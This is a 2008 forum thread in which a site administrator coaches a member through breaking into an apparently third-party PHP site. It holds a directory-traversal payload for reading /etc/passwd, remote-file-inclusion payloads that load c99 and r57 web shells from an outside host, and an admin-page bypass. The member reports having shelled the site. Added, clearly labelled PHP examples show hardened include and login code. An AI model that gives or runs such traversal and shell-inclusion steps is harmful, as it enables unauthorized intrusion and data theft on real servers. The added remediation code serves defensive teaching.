ThisisLegal.com

ThisisLegal Forums


#1 2008-10-07 09:16:37

sam207
Member
Registered: 2008-03-17
Posts: 90

Full path disclosure vulnerability!

Hi guys, greetz
I have a question about the full path disclosure vulnerability...
Suppose there is a URL parameter as follows:
www.site.com/index.php?page=info
& when I put ' at the end, it errors, & the error produced is as follows:
Warning: main(info\'.php): failed to open stream: No such file or directory in /home/www/web299/web/index.php on line 114

Warning: main(): Failed opening 'info\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/www/web299/web/index.php on line 114

In this error, there is an include_path='.:/usr/share/php:/usr/share/pear'
Now how can I access the included files from this disclosure?
In fact, I have no idea about this... So please help me... And if you know any link to some good tutorials on it, could you provide the link? I have been searching for this thing but I can't get it.
Thanks in advance...
Regards~
sam207


Offline due to lack of time...


#2 2008-10-07 15:42:51

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

No problem, but to begin with, that looks vulnerable to RFI injection:

Warning: main(info\'.php)

It's trying to open '.php, meaning with a question mark you could do an RFI injection and hack the site (read the RFI tutorial).

The site is on Linux. As you can guess, usr/share is a shared user folder. pear is probably this, made by PHP:

http://pear.php.net/

/usr/share/php is just the path of the PHP source code runner. The colon separates the 2 include paths. All the other folders will probably be forbidden; if you can access them you will probably be able to root the box, but it's fairly unlikely.

If you could find out what's in the folders, using two dots (..) moves you back a directory:

page=../../../etc/passwd

for example, moving you back 3 directories and reading the password file in etc, if possible.


Site admin


#3 2008-10-07 19:41:23

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

I can't RFI because it's adding .php at the end of any kind of shell, & also whenever I add a null byte it adds \0.php at the end...
Even if I use a question mark at the end it's doing shell.txt?.php & giving a similar kind of error...
And how can I look at the files in usr/share/php or usr/share/pear? I can't do it by using ../
I added ../ so many times but still no luck...
& what is pear? Probably I will have to research it.


Offline due to lack of time...


#4 2008-10-08 04:35:28

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

/usr/share/php and /pear will just be the source code of PHP and PEAR, which is free to download from the PHP website

(http://www.php.net/downloads.php#v5)

and when it adds .php to the end, that's what the question mark is for: shell.txt?.php makes the page ignore what's after the question mark

include('http://www.site.com/c99.txt?.php');

anyway, try doing page=/../../../../etc/passwd and post the error it gives, and if you have a shell hosted somewhere do

index.php?page=http://pathto.shell/c99shell.txt?


Site admin

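Posts #1 to #4 describe an index.php that builds an include path from the page parameter, appends .php, and prints PHP warnings (with the server's absolute path and include_path) straight to the visitor. The script below is an added example, not code from the thread or from the site being discussed: it shows that vulnerable include shape next to an allowlist-based replacement that also stops the path disclosure by turning display_errors off. The function names, the pages directory and the allowlist entries are assumptions made for the example.

```php
<?php
// Added example (not from the thread): the include pattern implied by the
// warnings in post #1, beside a hardened replacement.

// Vulnerable shape: the request parameter is concatenated into the include
// path. It accepts ../ traversal, and if allow_url_include is on it also
// accepts a remote URL (the RFI discussed in posts #2 to #4).
function includePageUnsafe(string $page): void
{
    include $page . '.php';
}

// Hardened: only names from a fixed allowlist are mapped to files, and the
// resolved path is verified to stay inside the pages directory.
function resolvePage(string $page, string $baseDir, array $allowed): ?string
{
    if (!in_array($page, $allowed, true)) {
        return null;    // unknown page name: reject before touching the filesystem
    }
    $real = realpath($baseDir . '/' . $page . '.php');
    $base = realpath($baseDir);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;    // file missing, or it resolved outside the base directory
    }
    return $real;
}

function includePageSafe(string $page): void
{
    // 'pages' directory and allowlist are assumptions for this example
    $path = resolvePage($page, __DIR__ . '/pages', ['home', 'info', 'contact']);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path;
}

// The full path disclosure in post #1 comes from warnings being echoed to the
// browser. Log them server-side instead of displaying them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

includePageSafe($_GET['page'] ?? 'home');
```

With the allowlist in place the value of page never reaches the filesystem or a URL wrapper unless it is one of the known names, so neither the .php suffix trick nor the ? trick from post #4 matters; the realpath check is a second line of defence in case the allowlist is later loosened.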

#5 2008-10-08 05:28:39

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

Thanks, I could RFI the site & I used the r57 shell... I'm not able to edit the existing pages & I can't chmod any files...
Also, can you tell me how many ways you can exploit the following code:

<?php
$passwordget = $_POST['password'];
$password    = md5($passwordget);             // unsalted MD5 of the submitted password

$username = $_POST['username'];
$quota    = $_POST['quota'];                   // client-supplied field chooses the table below

if ($quota == "Admin") { $table = "adminlogin"; } else { $table = "memberlogin"; }

if (empty($username))    { die("No Username specified"); }
if (empty($passwordget)) { die("No Password specified"); }

include "connect1.php";                        // opens the mysql connection
// $username is interpolated into the query string without any escaping
$query  = "SELECT password from $table where username='$username'";
$result = mysql_query($query) or die("Cannot connect you to the admin page");
$row    = mysql_fetch_array($result);
$passcheck = $row['password'];                 // stored hash for that username (NULL when no row matched)
//$passcheck=md5($passcheckget);

//if($row=mysql_fetch_array($result))
//{
// loose (==) string comparison of the two hashes
if (!($password == $passcheck)) {
    die("Wrong username/password");
}

session_start();
session_register("usernameid");                // registers the global $usernameid, which is never assigned
session_encode();
// the raw POST username is placed into the redirect header
if ($quota == "Admin") {
    $url = "Location: admin/adcd0f89fed565f64fd009c3e582c673.php?username=$username";
    header($url);
} else {
    $url = "Location: admin/f55171b381e92093b23f5ea0e7c7fc13.php?username=$username";
    header($url);
}

?>

Thanks


Offline due to lack of time...

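The login script quoted in post #5 lets the form decide which table is queried, concatenates the username into the SQL, compares unsalted MD5 hashes, and copies the username into a redirect header. The script below is an added example, not code from the thread or from the site under discussion: it is a hardened rewrite of the same login flow using PDO prepared statements, password_hash/password_verify, a role read from the database rather than from the form, and a session that is regenerated after login. It assumes a single users table with columns username, password_hash and role ('admin' or 'member'); the DSN, credentials and redirect targets are placeholders.

```php
<?php
// Added example (not from the thread): hardened rewrite of the login in post #5.
// Assumes table users(username, password_hash, role) where password_hash was
// produced by password_hash(). DSN and credentials are placeholders.
declare(strict_types=1);

session_start();

function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=APP_DB_PLACEHOLDER;charset=utf8mb4',
        'APP_USER_PLACEHOLDER',
        'APP_PASSWORD_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
        ]
    );
}

// Returns the user's role on success, null on failure. The role comes from the
// stored row, never from a form field like the original "quota".
function authenticate(PDO $pdo, string $username, string $password): ?string
{
    if ($username === '' || $password === '') {
        return null;
    }

    // Parameterised query: the username is bound, not concatenated into SQL,
    // and the table name is fixed in the code.
    $stmt = $pdo->prepare('SELECT password_hash, role FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a throwaway hash when the user is unknown, so the
    // response time does not reveal whether the username exists.
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('not-a-real-password', PASSWORD_DEFAULT);
    }
    $hash = ($row !== false) ? $row['password_hash'] : $dummyHash;

    if (!password_verify($password, $hash) || $row === false) {
        return null;
    }
    return $row['role'];
}

$username = $_POST['username'] ?? '';
$role     = authenticate(connect(), $username, $_POST['password'] ?? '');

if ($role === null) {
    http_response_code(401);
    exit('Wrong username/password');   // one message for both failure cases
}

// Fresh session id after a successful login, then store identity server-side.
session_regenerate_id(true);
$_SESSION['username'] = $username;
$_SESSION['role']     = $role;

// Redirect targets are fixed in code; nothing from the request goes into the header.
header('Location: ' . ($role === 'admin' ? '/admin/index.php' : '/member/index.php'));
exit;
```

The pages behind /admin/ must themselves check $_SESSION['role'] on every request; a role that lives only in the redirect URL, as in the original script, is exactly what post #6 proposes bypassing by visiting the admin page directly.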

#6 2008-10-09 05:56:41

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

That's some really strange code. There's probably a hidden element on the form called quota that needs to be changed to Admin, and those PHP pages seem to be md5 encrypted. Have you tried going to

/admin/adcd0f89fed565f64fd009c3e582c673.php?username=Admin

I noticed from your first post that magic quotes is on. This makes things harder.

PS: you should check the source code of connect1.php; if the site owner's not very clever he will have used the same username and password to connect to the database.


Site admin


#7 2008-10-09 07:53:50

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

I had already tried to use that admin thing but that does not work... Also I checked the source of connect1.php, which has no good info... I mean the same username & password is not used... Also, what do you think about session poisoning? Since we know the session that the script sets, can't we poison the session? The session being used for admin is adcd0f89fed565f64fd009c3e582c673, which is also in the URL of admin... Also the site admin is using the site for some illegal stuff in hidden directories. I included a shell & found that he has been saving some stuff (porn) in the downloads folder.


Offline due to lack of time...


#8 2008-10-09 11:57:02

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

This has been solved over PM


Site admin
